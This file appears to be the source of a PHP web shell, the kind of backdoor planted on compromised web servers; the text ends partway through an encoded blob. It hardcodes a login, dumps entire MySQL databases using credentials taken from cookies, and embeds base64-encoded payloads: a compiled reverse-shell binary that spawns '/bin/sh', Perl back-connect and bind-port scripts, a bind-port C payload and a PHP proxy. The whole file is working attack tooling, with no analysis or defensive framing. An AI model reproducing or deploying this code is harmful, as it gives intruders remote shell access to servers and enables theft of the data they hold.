<?php$user = "hemiad";$pass = "1236987"; ob_start();error_re

1. <?php
2.  
3. $user = "hemiad";
4. $pass = "1236987";
5.  
6.  
7.  
8. ob_start();
9. error_reporting(0);
10. @set_time_limit(0);
11. @ini_set('max_execution_time',0);
12. @ini_set('output_buffering',0);
13.  
14. // Dump Database
15.  
16. if($_GET["action"] == "dumpDB")
17. {
18. $self=$_SERVER["PHP_SELF"];
19. if(isset($_COOKIE['dbserver']))
20. {
21. $date = date("Y-m-d");
22. $dbserver = $_COOKIE["dbserver"];
23. $dbuser = $_COOKIE["dbuser"];
24. $dbpass = $_COOKIE["dbpass"];
25. $dbname = $_GET['dbname'];
26. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
27.  
28. $file = "Dump-$dbname-$date";
29.  
30. $file="Dump-$dbname-$date.sql.gz";
31. $fp = gzopen($file,"w");
32.  
33. function write($data)
34. {
35. global $fp;
36.  
37. fwrite($fp,$data);
38.  
39. }
40. mysql_connect ($dbserver, $dbuser, $dbpass);
41. mysql_select_db($dbname);
42. $tables = mysql_query ("SHOW TABLES");
43. while ($i = mysql_fetch_array($tables))
44. {
45. $i = $i['Tables_in_'.$dbname];
46. $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
47. write($create['Create Table'].";\n\n");
48. $sql = mysql_query ("SELECT * FROM ".$i);
49. if (mysql_num_rows($sql)) {
50. while ($row = mysql_fetch_row($sql)) {
51. foreach ($row as $j => $k) {
52. $row[$j] = "'".mysql_escape_string($k)."'";
53. }
54. write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
55. }
56. }
57. }
58.  
59. fclose ($fp);
60.  
61. header("Content-Disposition: attachment; filename=" . $file);
62. header("Content-Type: application/download");
63. header("Content-Length: " . filesize($file));
64. flush();
65.  
66. $fp = fopen($file, "r");
67. while (!feof($fp))
68. {
69. echo fread($fp, 65536);
70. flush();
71. }
72. fclose($fp);
73. }
74. }
75.  
76. $back_connect_c="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+D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EgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
77.  
78. $backconnect_perl="pVRdb9owFH1H4j/cptVIJgIETaoESjVGoUXToCLQF4pQIBfwFuzIdtahaf99dmzK2IRWqY6Uj3uOzzm+cXJ5Uc8Fry8JrWfI03IpFwiDUasVsdU3lO1y6UrshcQdqBFCpWAuY7GtaKgzvuuGH9X5sQ3lElmDW5QuwqYHP1VFzck4oRKcqYg32IKrBszumZBzmD0wri5P9Ik6bUNNCILT+1GwguZ1raGOAJpBMwBL+gUmoA1nn/okxfuYJinqiigwNxp1P/cmVXjoLwZDfaMLi2gy7nW+VGGDMuNMsuWexjt0K3KVVTwPGC9C2Mwzfw5TGi9TBMlgjIKl3xF0fBtnxSjF1dFLW8dJwheEFo14nAXzKhCKchFLdqg15t5/rLpG90+rA+/93AYhdFPgQ5Vfc04oVkBxarUaHGzhX60oi5+ploq2mKZwTggTHYvjjkmErXK1TLNw/ybOJVunudi6njZgGVI3mtwOhlVwbt4ZlnMCjaaT6hmoNx7/DdlE4RvGydL8s2Pgf7g2zTjHeI1QlyWqZZ/20OFfc/oaobctzUiZD9V1cLVl4PthGBUFQtcsDH2/Dbne7ODHbc1QE16IU4H8SCOJIbzAt4SrTcD43uDZsyXA0Ul3TKNgXpiNYv8dnvK67I36vwE=";
79.  
80.  
81. $zone="vVRtb9owEP6OxH+4ZhFKWkJg6roqEFS0VStaX1ChmybKB8c5wGpiZ7ZZS6vut8+Gjm5V1r18mPLBuedenrvznV9shQslw4TxsECZVSvVCpt6Wwe983cfxq2Jf1etFJJxDc6lNh+/5E77JyhHUFTq5e6c0CsYH0xgSeZCwDgVegJU5FDidCSuYSTgQmEElhZuBcdGkUFnyDRCxpTuQudCwlucEooSTkmO3e+B8IZpc9xXKy6RnyGGdbbNiQHdmVwUYoO1LEbnIi9grTGiKJB7pO50rLfjG+RAWdYYOqRrzTOh0CNW4SYGVZRkRHorIwtOhfRcEjfbLunEbmKOnR2/Wrl7oLFmY5dYYtPJjQjxVwg/iQVQwkGhLZJfKUjQhEOQWGRLH+5ALRKl5aNbHZp1eO1D7DhtuN80cbwzgYFQ2mTGU/ZIum7QQiH0z6JoKOgV6ijqnx6ObDXKyKagp6qgy/HaGyDKXppKiLvgPJ+oUwdrPRBSW+t9k+JACi1WrpoWjg9CAscbvbn2NbczOBuOIORCs+kyzIlS8BumpwF6lGKhI9gOty/lj3P1oD/HKUqU0b/FDY4Jny3IzI6lDhJZSvFGcI1cB6NlYexIUWSMEs0ED2+Cv2Q1oThS6xvBe8Qi6GXsC5ayml2RQW9miCM4Ebcsy0i422iCZ1asMPRJhm04GfYPYa/RbMNHxlNxreB0BK8aLb805JEZoD9plJshn+l5vD48J10vZbzeqFoqcsJ4K34+0GZEa/ahyEWKcWu/JpEoweO9mpn7nOl4iDxd5er/quvHqyQieEiqtLCBJLOcRMBFQAmdlze0FPwfpW2emBWnLVRl5u69l/b3/hs=";
82.  
83. $bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
84.  
85. $bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
86.  
87. $phpproxy="
88. 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